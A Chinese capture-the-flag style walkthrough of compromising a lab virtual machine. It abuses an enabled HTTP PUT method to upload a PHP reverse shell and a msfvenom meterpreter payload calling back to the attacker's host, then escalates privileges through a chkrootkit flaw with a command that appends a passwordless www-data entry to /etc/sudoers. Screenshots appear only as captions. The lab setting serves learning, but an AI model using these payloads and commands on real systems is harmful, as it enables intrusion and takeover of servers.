web靶机系列-put上传

主机:192.168.136.133
靶机:192.168.136.140
用namp扫描靶机地址
web靶机系列-put上传_第1张图片
发现开放80、22端口,用dirb、nikto扫描,没有发现可用的漏洞,扫描只有一个网址可以进入http://192.168.136.140/test/
web靶机系列-put上传_第2张图片
web靶机系列-put上传_第3张图片
测试一下是否存在PUT漏洞,发现有put漏洞
web靶机系列-put上传_第4张图片
发现存在PUT方法
用 /usr/share/webshells/php 目录下php-reverse-shell.php,上传上去
火狐的RESTClient可用,可以PUT,但不能直接传文件,但可以选择类型,把生成的reverse_shell代码复制进去上传
web靶机系列-put上传_第5张图片
监听端口,反弹shell(注:换成其他高位端口不能监听成功,防火墙过滤掉了)
web靶机系列-put上传_第6张图片
优化终端python -c “import pty;pty.spawn(’/bin/bash’)”
web靶机系列-put上传_第7张图片

构造payload
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.136.133 LPORT=443 > shell_443.php
web靶机系列-put上传_第8张图片
将shell_55555上传到靶机的test目录下;
curl -v -H “Expect:” -T shell_443.php http://192.168.136.140/test/
web靶机系列-put上传_第9张图片
web靶机系列-put上传_第10张图片
在Kali测试机上打开msfconsole,exploit/multi/handler模块,指定IP和端口进行监听,然后放到后台
web靶机系列-put上传_第11张图片
设置参数
web靶机系列-put上传_第12张图片
访问shell_443.php
web靶机系列-put上传_第13张图片
即可触发服务器端反弹TCP的操作, 在msfconsole里就会得到一个meterpreter的shell。
web靶机系列-put上传_第14张图片
在meterpreter中用shell命令来得到一个交互式的shell,但是并没有tty,需要用python生成一个bash。
python -c ‘import pty;pty.spawn("/bin/bash")’
web靶机系列-put上传_第15张图片
查看靶机服务器和版本信息;
web靶机系列-put上传_第16张图片
扫描版本的漏洞
web靶机系列-put上传_第17张图片
利用这个/usr/share/exploitdb/exploits/linux/local/38775.rb
web靶机系列-put上传_第18张图片
web靶机系列-put上传_第19张图片
可以看到chkrootkit存在本地提权漏洞

第一种添加当前用户www-data到sudoers列表中
新建一个文件update
web靶机系列-put上传_第20张图片
给文件添加执行权限
web靶机系列-put上传_第21张图片
添加当前用户www-data到sudoers列表中;
echo ‘chmod +w /etc/sudoers && echo “www-data ALL=(ALL)NOPASSWD:ALL” >> /etc/sudoers’ > /tmp/update
web靶机系列-put上传_第22张图片

你可能感兴趣的:(web靶机系列-put上传)